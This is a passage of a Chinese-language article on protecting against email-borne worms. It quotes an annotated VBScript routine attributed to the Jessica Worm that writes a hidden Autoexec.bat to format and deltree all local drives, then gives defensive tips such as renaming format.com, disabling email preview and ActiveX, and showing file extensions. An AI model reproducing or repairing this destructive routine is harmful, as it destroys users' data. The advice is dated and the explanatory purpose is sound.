4.防止病毒发作后搞“破坏”
蠕虫病毒的破坏性大家都有所了解吧?我们以著名的蠕虫病毒Jessica Worm中的部分破坏代码为例来加以分析说明:
sub killc() ‘这是子程序,破坏硬盘的过程。
On Error Resume Next‘容错语句,避免程序崩溃。
dim fs,auto,disc,ds,ss,i,x,dir
Set fs=CreateObjec(“Scipting.FileSystemObject”)
Set auto=fs.CreateTextFile(“c:Autoexec.bat”,True)‘建立或修改自动批处理。
auto.WriteLine(“@echo off”)‘屏蔽掉删除的进程。
auto.WriteLine(“Smartdrv”)‘加载磁盘缓冲。
Set disc=fs.Drives‘得到驱动器的集合。
For Each ds in disc
If ds.DriveType=2 Then‘如果驱动器是本地盘。
ss=ss&ds.DriveLetter‘就将符号连在一起。
End if
Next
ss=LCase(StrReverse(Trim(ss)))‘得到符号串的反向小写形式。
For i=to Len(ss)‘遍历每个驱动器。
x=Mid(ss,i,1) ‘读每个驱动器的符号。
auto.WriteLine(“format/autotest/q/u‘&x&’:”) ‘反向(从Z:到A:)自动格式化驱动器。
Next
Fori=1 to Len(ss)
x=Mid(ss,i,1)
auto.WriteLine(“deltree/y ‘&x&’:”) ‘怕Format失效用Deltree双保险
Next
auto.Close‘关闭批处理文件。
set dir=fs.GetFile(“c:Autoexec.bat”)
dir.attributes=dir.atlributes+2 ’将自动批处理文件改为隐藏。
End sub
如果以前没有亲身体验到蠕虫病毒的厉害,那么从这个小例子中,应该知道蠕虫病毒的厉害了吧?
电子邮件型病毒不可能像传统病毒一样调用汇编程序来实现破坏功能。它只能通过调用已经编译好的带有破坏性的程序来实现这一功能。那么我们就把本地的带有破坏性的程序改名字,例如把format.com改成fmt.com,那样病毒的编辑者就无法实现用调用本地命令来实现这一功能。仅仅如此还不足以真正地防范电子邮件型病毒,我们还要把上面所说的方法结合起来才可有效防范电子邮件型病毒。另外,还需结合下面的方法才能更好地防范电子邮件型病毒。
5.通用规则
(1)在收发邮件时打开防火墙和杀毒软件来防杀邮件病毒,这一条没有什么好说的,应该是共识了。
(2)不要轻易暴露自己的信箱地址,注意自己的网上言语,尽量不要得罪人,免得人家攻击。
(3)发现邮箱中出现不明来源的邮件应小心谨慎对待,遇到带可执行文件(*.EXE,*.COM)或带有宏功能的附件(*.DOC等),不要选打开,最好先选择为“另存为”到磁盘上,用杀毒软件先查杀。
(4)除非必要,尽量关闭邮件“预览”特性。很多嵌入在HTML格式邮件中的病毒代码会在预览的时候执行,我们经常从媒体看到这样一种恐怖说法:“用户只要收到这些带病毒的邮件,即使不打开,病毒也能发作”,其实就是病毒代码在邮件预览的时候执行的。
(5)设定邮件的路径在C盘以外,因为C分区是病毒攻击频率最高的地方,万一受到防火墙不能过滤的新型病毒攻击成功,受到的损失也可减少。
(6)收到新邮件尽量使用“另存为”选项为邮件做备份(注意分类储存,不要在同一根目录下放全部的邮件)此时还可以为邮件起一个更一目了然的名字,既是备份,又方便管理查阅,一举两得。
(7)对于利用文件的扩展名做文章的病毒,不要隐藏系统中已知文件类型的扩展名称。 Windows操作系统默认的是“隐藏已知文件类型的扩展名称”。显示所有文件类型的扩展名称的方法是(以Windows98系统为例):选择“控制面板”→“查看”→“文件夹选项”→“查看”→“文件和文件夹”,其中有一项目是“隐含已知文件类型的扩展名”,不选择该项目即可。当然Windows系统下对于一些特别的文件的扩展名,比如“垃圾虫ScrapWorm”利用的是“SHS”扩展名称有特殊的设置,具有该扩展名称的文件,即使用户使用了以上的方法还是不能显示出其扩展名称。解决的方法是:在注册表编辑器HEY_CLASSES_ROOTShellScrap键下,有一个键值“NeverShowExt”,它是导致“.SHS”文件扩展名无法显示的罪魁祸首。删除这个键值,就可以看到“.SHS”扩展名了。
(8)将系统的网络连接的安全级别设置至少为“中等”,它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害。点击“控制面板”中的“Intemet”项目中的“安全”标签,会出现“Intemet”项的安全级别设置窗口,将其至少设置成“中等”级别。单击菜单栏里“Intemet选项”安全选项卡里的自定义级别按钮,把“ActiveX控件及插件”的一切设为禁用,这样就不怕蠕虫病毒了。
(9)如果可能,尽量不要使用Outlook Express收发邮件,可以使用FoxMail等电子邮件客户端来代替它;另外,要注意为浏览器打上最新的补丁;对于通过脚本工作的病毒,可以采用在浏览器中禁止Java或ActiveX运行的方法来阻止病毒的发作。
(10)尽量不要在“通讯簿”中设置太多的名单,如果要发送新邮件,可以进入邮件的存储目录,打开客户发来的邮件,利用“回复”功能来发送新邮件(删除原有内容即可)如果客户或朋友较多,利用回复不方便,可以新建一个文本文件(自己做好备份,记得路径及名称),把客户的邮件地址一一列入其中,要发新邮件的时候,利用“CTRL”+“C”,“CTRL”+“V”快捷键把客户邮件地址粘贴到“收件人”栏中去。这样虽然麻烦一点,但是有效地防止了邮件病毒的进一步传播,须知现在的邮件病毒变种既多更新又快,防杀难免有漏洞,病毒一发作,就自动复制无数复本发送到“通讯簿”里所有的用户。用此法可以避免病毒的扩散,特别是有商业关系的客户不会因此受到牵连,发生误会从而影响合作关系。此法还可起到保密客户的作用,因为名单文本的目录和名称只有本机主人才知道。
通过以上的层层设防,用户的系统应该能防御绝大多数的邮件型病毒了。
